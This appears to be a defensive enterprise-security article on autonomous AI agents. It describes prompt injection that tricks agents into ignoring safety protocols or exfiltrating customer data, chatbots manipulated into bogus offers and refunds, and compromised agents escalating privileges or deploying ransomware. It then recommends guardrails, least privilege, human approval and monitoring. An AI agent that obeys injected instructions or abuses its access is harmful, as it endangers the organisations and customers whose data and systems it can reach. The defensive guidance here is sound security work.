The attack surface you can’t see: Securing your autonomous AI and agentic systems

A new frontier of risk

For decades, cybersecurity was about securing static assets — servers, endpoints and code. Even complex modern software is typically deterministic; it follows clear, predefined rules.

But the introduction of autonomous AI agents fundamentally changes this security game. The very autonomy and connectivity that make these agents so powerful, their ability to set goals, access databases and execute code across your network, also turn them into a significant, self-guided security risk. We are moving from securing static software to securing dynamic, self-evolving, decision-making systems.

The core problem? Many organizations are rushing deployment while operating with a massive blind spot. As per a recent World Economic Forum article, despite a staggering 80% of breaches involving a compromised identity, only 10% of executives have a well-developed strategy for managing their agentic identities. This lack of preparation exposes your enterprise to three novel and critical vulnerabilities.

Critical vulnerability 1: The black box attack

The first challenge isn’t a hacker — it’s opacity.

The deep, non-deterministic nature of the underlying Large Language Models (LLMs) and the complex, multi-step reasoning they perform create systems where key decisions are often unexplainable. When an AI agent performs an unauthorized or destructive action, auditing it becomes nearly impossible.

The problem: The opaque nature of large models and agents can make it difficult to audit their decisions or trace an unauthorized action back to its source.

The stakes: Imagine an agent with persistent access to your financial data making a series of unexplainable trades that lose money. Was it a subtle bug, a clever hack, or an unmonitored prompt? Without a clear, step-by-step reasoning log, you cannot be sure, creating a compliance nightmare.

Critical vulnerability 2: Prompt injection and goal manipulation

Traditional security checks look for malicious code. The Agentic AI security model must look for malicious language.

Prompt injection exploits the fact that an AI agent’s reasoning core is a language model. Attackers can use cleverly crafted, deceptive prompts to trick the AI into ignoring its internal safety protocols or performing a malicious action. This is a proven and escalating threat. A survey by Gartner reported that 32% of respondents have already experienced prompt injection attacks against their applications.

The stakes: This isn’t just about an agent misbehaving; it can cause direct financial harm. We’ve seen public instances where chatbots have been manipulated to promise a $76,000 car for just $1, or improperly issue a customer a massive refund. The enterprise risk is far greater: an agent designed to summarize customer complaints could be manipulated by a hidden, malicious prompt to ignore its primary function and exfiltrate sensitive customer data from the database it’s connected to.

Critical vulnerability 3: Rogue agents and privilege escalation

When you give an AI agent autonomy and tool access, you create a new class of trusted digital insider. If that agent is compromised, the attacker inherits all its permissions.

An autonomous agent, which often has persistent access to critical systems, can be compromised and used to move laterally across the network and escalate privileges. The consequences of this over-permissioning are already being felt. According to research by Polymer DLP, the problem is highly common: 39% of companies encountered rogue agents found they accessed unauthorized systems or resources. 33% discovered agents had inadvertently shared sensitive data.

The incident: This risk is not theoretical. In one cautionary incident, an autonomous AI agent meant to assist with app development accidentally deleted a production database with over 1,200 executive records, simply because it had been granted unchecked access.

The scenario: Imagine a compromised AI agent, originally tasked with automating IT support tickets, is exploited to create a new admin account or deploy ransomware. Because it operates without human-in-the-loop controls, it can execute its malicious goal unchecked for hours, becoming a true insider threat.

The agentic mandate: 4 steps to zero trust AI

The sheer speed and scale of agent autonomy demand a shift from traditional perimeter defense to a Zero Trust model specifically engineered for AI. This is no longer an optional security project; it is an organizational mandate for any leader deploying AI agents at scale.

To move from blind deployment to secure operation, CISOs and CTOs must enforce these four foundational principles:

1. Enforce code-level guardrails: Beyond the high-level system prompt, ensure the underlying code for every agent includes hard-coded output validators and tool usage limits. These code-level constraints act as immutable, deterministic safety checks that cannot be overridden by prompt injection attacks, providing a critical layer of defense against goal manipulation.
2. Segment the trust: Treat every autonomous agent as a separate, distinct security entity. They should not share the same system identity or API keys. Implement tokenization and short-lived credentials that expire immediately after the agent completes a single, defined task. This dramatically limits the window an attacker has to exploit a compromised agent.
3. Human-in-the-loop for high-risk actions: For any action that involves writing to a production database, modifying system configuration, or initiating financial transactions, the agent must be programmed to pause and request explicit human verification. While the goal is autonomy, high-stakes decisions require a circuit breaker.
4. Isolate development and production: Never allow development or testing agents access to live production data, even for read purposes. Maintain strict sandboxing between environments to ensure that a rogue agent or a flawed model in the testing phase cannot cause irreversible harm to your core business assets.

A new security playbook

Securing Agentic AI is not just about extending your traditional security tools. It requires a new governance framework built for autonomy, not just execution. The complexity of these systems demands a new security playbook focused on control and transparency:

• Principle of least privilege (PoLP): Apply strict, granular access controls to every AI agent, ensuring it only has the minimum permissions necessary for its task — nothing more. If an agent’s role is to summarize, it should not have delete permissions.
• Auditability & transparency: You cannot secure what you cannot see. Build systems with robust logging and explainability, requiring agents to expose their intermediate reasoning steps before executing sensitive actions.
• Continuous monitoring: Actively monitor agent behavior for any deviation from its intended purpose or any unexpected call to an external tool. Security teams need to look for abnormal patterns that signal a subtle prompt injection or a rogue agent.
• Red teaming: Proactively test your AI systems for prompt injection and over-permissioning vulnerabilities before deploying them to production. Assume a sophisticated adversary will try to turn your helpful agent into a weapon.

The future of enterprise efficiency is agentic, but the future of enterprise security must be built around controlling that agency. By establishing these guardrails now, you can embrace the power of autonomous AI without becoming its next victim

.

This article is published as part of the Foundry Expert Contributor Network.
Want to join?